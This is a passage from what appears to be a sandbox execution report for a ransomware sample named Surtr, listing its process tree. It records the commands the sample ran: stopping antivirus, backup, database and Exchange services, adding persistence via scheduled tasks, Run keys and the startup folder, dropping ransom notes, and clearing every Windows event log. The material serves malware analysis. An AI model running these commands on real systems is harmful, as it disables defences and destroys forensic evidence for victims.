  C:\Windows\system32\cmd.exe /c net stop "MBAMService"
  2⤵
  PID:4276
- - C:\Windows\system32\net.exe
    net stop "MBAMService"
    3⤵
    PID:608
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MBAMService"
      4⤵
      PID:2052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MBEndpointAgent"
  2⤵
  PID:2740
- - C:\Windows\system32\net.exe
    net stop "MBEndpointAgent"
    3⤵
    PID:4476
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MBEndpointAgent"
      4⤵
      PID:976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "McAfeeEngineService"
  2⤵
  PID:4244
- - C:\Windows\system32\net.exe
    net stop "McAfeeEngineService"
    3⤵
    PID:5008
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "McAfeeEngineService"
      4⤵
      PID:1672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "McAfeeFramework"
  2⤵
  PID:2028
- - C:\Windows\system32\net.exe
    net stop "McAfeeFramework"
    3⤵
    PID:3284
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "McAfeeFramework"
      4⤵
      PID:3268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "McAfeeFrameworkMcAfeeFramework"
  2⤵
  PID:4916
- - C:\Windows\system32\net.exe
    net stop "McAfeeFrameworkMcAfeeFramework"
    3⤵
    PID:4444
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "McAfeeFrameworkMcAfeeFramework"
      4⤵
      PID:1784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "McShield"
  2⤵
  PID:3216
- - C:\Windows\system32\net.exe
    net stop "McShield"
    3⤵
    PID:1176
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "McShield"
      4⤵
      PID:1496
    - - C:\Windows\system32\net.exe
        
        net stop "MSSQL$SYSTEM_BGC"
        5⤵
        
        PID:1180
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "mfemms"
  2⤵
  PID:4132
- - C:\Windows\system32\net.exe
    net stop "mfemms"
    3⤵
    PID:2520
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "mfemms"
      4⤵
      PID:2332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "mfevtp"
  2⤵
  PID:3144
- - C:\Windows\system32\net.exe
    net stop "mfevtp"
    3⤵
    PID:4112
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "mfevtp"
      4⤵
      PID:1908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MMS"
  2⤵
  PID:3348
- - C:\Windows\system32\net.exe
    net stop "MMS"
    3⤵
    PID:3948
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MMS"
      4⤵
      PID:1456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +R /S "%TEMP%\Service"
  2⤵
  PID:3296
- - C:\Windows\system32\attrib.exe
    attrib +R /S "C:\Users\Admin\AppData\Local\Temp\Service"
    3⤵
    - Views/modifies file attributes
    PID:3260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "mozyprobackup"
  2⤵
  PID:3592
- - C:\Windows\system32\net.exe
    net stop "mozyprobackup"
    3⤵
    PID:2308
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "mozyprobackup"
      4⤵
      PID:896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
  2⤵
  PID:3320
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
    3⤵
    - Creates scheduled task(s)
    PID:4752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MsDtsServer"
  2⤵
  PID:5012
- - C:\Windows\system32\net.exe
    net stop "MsDtsServer"
    3⤵
    PID:1796
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MsDtsServer"
      4⤵
      PID:420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
  2⤵
  PID:4564
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:1196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MsDtsServer100"
  2⤵
  PID:2320
- - C:\Windows\system32\net.exe
    net stop "MsDtsServer100"
    3⤵
    PID:4140
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MsDtsServer100"
      4⤵
      PID:4412
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MsDtsServer110"
  2⤵
  PID:256
- - C:\Windows\system32\net.exe
    net stop "MsDtsServer110"
    3⤵
    PID:1300
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MsDtsServer110"
      4⤵
      PID:4324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"
  2⤵
  - Drops startup file
  PID:2488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  2⤵
  PID:4988
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    PID:280
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  2⤵
  PID:1608
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    - Adds Run key to start application
    PID:1632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSExchangeES"
  2⤵
  PID:1620
- - C:\Windows\system32\net.exe
    net stop "MSExchangeES"
    3⤵
    PID:1684
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSExchangeES"
      4⤵
      PID:2064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  2⤵
  PID:4544
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    - Adds Run key to start application
    PID:3400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSExchangeIS"
  2⤵
  PID:4220
- - C:\Windows\system32\net.exe
    net stop "MSExchangeIS"
    3⤵
    PID:4580
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSExchangeIS"
      4⤵
      PID:3640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  2⤵
  PID:4272
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    - Adds Run key to start application
    PID:4780
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\Private_DATA.surt" "%USERPROFILE%\Desktop\Private_DATA.surt"
  2⤵
  PID:1220
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSExchangeMGMT"
  2⤵
  PID:2564
- - C:\Windows\system32\net.exe
    net stop "MSExchangeMGMT"
    3⤵
    PID:2316
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSExchangeMGMT"
      4⤵
      PID:3276
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\ID_DATA.surt" "%USERPROFILE%\Desktop\ID_DATA.surt"
  2⤵
  PID:5000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\SURTR_README.hta" "%USERPROFILE%\Desktop\SURTR_README.hta"
  2⤵
  PID:1108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\Service\SURTR_README.txt" "%USERPROFILE%\Desktop\SURTR_README.txt"
  2⤵
  PID:2300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSExchangeMTA"
  2⤵
  PID:3728
- - C:\Windows\system32\net.exe
    net stop "MSExchangeMTA"
    3⤵
    PID:3304
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSExchangeMTA"
      4⤵
      PID:2936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"
  2⤵
  PID:2176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wevtutil.exe el
    3⤵
    PID:4972
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe el
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:356
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "AirSpaceChannel"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:980
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Analytic"
    3⤵
    PID:1864
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Application"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2380
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "DirectShowFilterGraph"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2532
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "DirectShowPluginControl"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2856
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Els_Hyphenation/Analytic"
    3⤵
    PID:2388
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "EndpointMapper"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1668
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "FirstUXPerf-Analytic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5048
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "ForwardedEvents"
    3⤵
    PID:3128
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "General Logging"
    3⤵
    PID:2836
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "HardwareEvents"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1596
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "IHM_DebugChannel"
    3⤵
    PID:976
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Intel-iaLPSS-GPIO/Analytic"
    3⤵
    PID:3008
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Debug"
    3⤵
    PID:3284
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Intel-iaLPSS-I2C/Analytic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:680
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Performance"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4952
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Intel-iaLPSS2-I2C/Performance"
    3⤵
    PID:2332
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Intel-iaLPSS2-I2C/Debug"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4456
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Internet Explorer"
    3⤵
    PID:4656
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Key Management Service"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2164
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MF_MediaFoundationDeviceProxy"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4408
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MedaFoundationVideoProc"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:344
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MedaFoundationVideoProcD3D"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1976
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationAsyncWrapper"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4880
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationContentProtection"
    3⤵
    PID:276
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationDS"
    3⤵
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    PID:280
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationDeviceProxy"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2160
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationMediaEngine"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4964
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationPerformance"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2200
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationPerformanceCore"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1620
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationPipeline"
    3⤵
    PID:2460
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationPlatform"
    3⤵
    PID:2956
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationSrcPrefetch"
    3⤵
    PID:3068
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-AppV-Client-Streamingux/Debug"
    3⤵
    PID:1744
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-AppV-Client/Admin"
    3⤵
    PID:1108
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-AppV-Client/Debug"
    3⤵
    PID:1200
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-AppV-Client/Operational"
    3⤵
    PID:1324
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-AppV-Client/Virtual Applications"
    3⤵
    PID:3500
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-AppV-SharedPerformance/Analytic"
    3⤵
    PID:5060
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Admin"
    3⤵
    PID:1472
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Debug"
    3⤵
    PID:4364
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Diagnostic"
    3⤵
    PID:3268
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-IE/Diagnostic"
    3⤵
    PID:4088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"
    3⤵
    PID:1784
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"
    3⤵
    PID:4948
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-OneCore-Setup/Analytic"
    3⤵
    PID:952
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"
    3⤵
    PID:4592
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"
    3⤵
    PID:1456
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-User Experience Virtualization-Admin/Debug"
    3⤵
    PID:4816
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Debug"
    3⤵
    PID:1020
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Operational"
    3⤵
    PID:3260
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Analytic"
    3⤵
    PID:4108
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Debug"
    3⤵
    PID:4464
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Operational"
    3⤵
    PID:4988
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-User Experience Virtualization-IPC/Operational"
    3⤵
    PID:4392
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Analytic"
    3⤵
    PID:4924
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Debug"
    3⤵
    PID:4076
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Operational"
    3⤵
    PID:3048
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AAD/Analytic"
    3⤵
    PID:592
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AAD/Operational"
    3⤵
    PID:3496
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"
    3⤵
    PID:3132
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ASN1/Operational"
    3⤵
    PID:4904
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ATAPort/General"
    3⤵
    PID:3620
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"
    3⤵
    PID:1844
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2836
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-All-User-Install-Agent/Admin"
    3⤵
    PID:2120
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AllJoyn/Debug"
    3⤵
    PID:3688
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AllJoyn/Operational"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2332
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppHost/Admin"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4656
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppHost/ApplicationTracing"
    3⤵
    PID:3352
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppHost/Diagnostic"
    3⤵
    PID:4116
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppHost/Internal"
    3⤵
    PID:4752
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppID/Operational"
    3⤵
    PID:3324
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"
    3⤵
    PID:1944
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"
    3⤵
    PID:2064
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Deployment"
    3⤵
    PID:5000
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Execution"
    3⤵
    PID:1108
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Admin"
    3⤵
    PID:1816
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Analytic"
    3⤵
    PID:4872
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Debug"
    3⤵
    PID:4924
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Diagnostics"
    3⤵
    PID:3208
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppModel-State/Debug"
    3⤵
    PID:812
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppModel-State/Diagnostic"
    3⤵
    PID:3784
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppReadiness/Admin"
    3⤵
    PID:4084
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppReadiness/Debug"
    3⤵
    PID:404
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppReadiness/Operational"
    3⤵
    PID:1436
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppSruProv"
    3⤵
    PID:2348
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Diagnostic"
    3⤵
    PID:2328
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Operational"
    3⤵
    PID:3596
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Debug"
    3⤵
    PID:1668
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Diagnostic"
    3⤵
    PID:660
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Operational"
    3⤵
    PID:1596
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Restricted"
    3⤵
    PID:604
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Analytic"
    3⤵
    PID:1072
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Operational"
    3⤵
    PID:4444
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"
    3⤵
    PID:4660
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"
    3⤵
    PID:4996
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"
    3⤵
    PID:3948
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"
    3⤵
    PID:4412
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Compatibility-Infrastructure-Debug"
    3⤵
    PID:3260
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
    3⤵
    PID:5020
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Analytic"
    3⤵
    PID:4140
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Trace"
    3⤵
    PID:1300
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
    3⤵
    PID:2292
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"
    3⤵
    PID:272
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"
    3⤵
    PID:1744
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Steps-Recorder"
    3⤵
    PID:1252
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ApplicationResourceManagementSystem/Diagnostic"
    3⤵
    PID:5052
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ApplicationResourceManagementSystem/Operational"
    3⤵
    PID:1432
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Debug"
    3⤵
    PID:2132
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Operational"
    3⤵
    PID:1572
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Performance"
    3⤵
    PID:3868
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AssignedAccess/Admin"
    3⤵
    PID:1452
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AssignedAccess/Operational"
    3⤵
    PID:4848
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Admin"
    3⤵
    PID:1144
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Operational"
    3⤵
    PID:4248
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AsynchronousCausality/Causality"
    3⤵
    PID:2508
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"
    3⤵
    PID:1576
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/GlitchDetection"
    3⤵
    PID:2856
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/Informational"
    3⤵
    PID:2532
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/Operational"
    3⤵
    PID:4332
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/Performance"
    3⤵
    PID:2424
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/PlaybackManager"
    3⤵
    PID:2364
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"
    3⤵
    PID:3596
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"
    3⤵
    PID:4320
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Authentication/AuthenticationPolicyFailures-DomainController"
    3⤵
    PID:4904
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUser-Client"
    3⤵
    PID:1668
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserFailures-DomainController"
    3⤵
    PID:644
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserSuccesses-DomainController"
    3⤵
    PID:3524
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"
    3⤵
    PID:1568
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic"
    3⤵
    PID:4288
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Operational"
    3⤵
    PID:608
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BackgroundTransfer-ContentPrefetcher/Operational"
    3⤵
    PID:5064
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Backup"
    3⤵
    PID:3128
- - C:\Windows\system32\wevtutil.exe
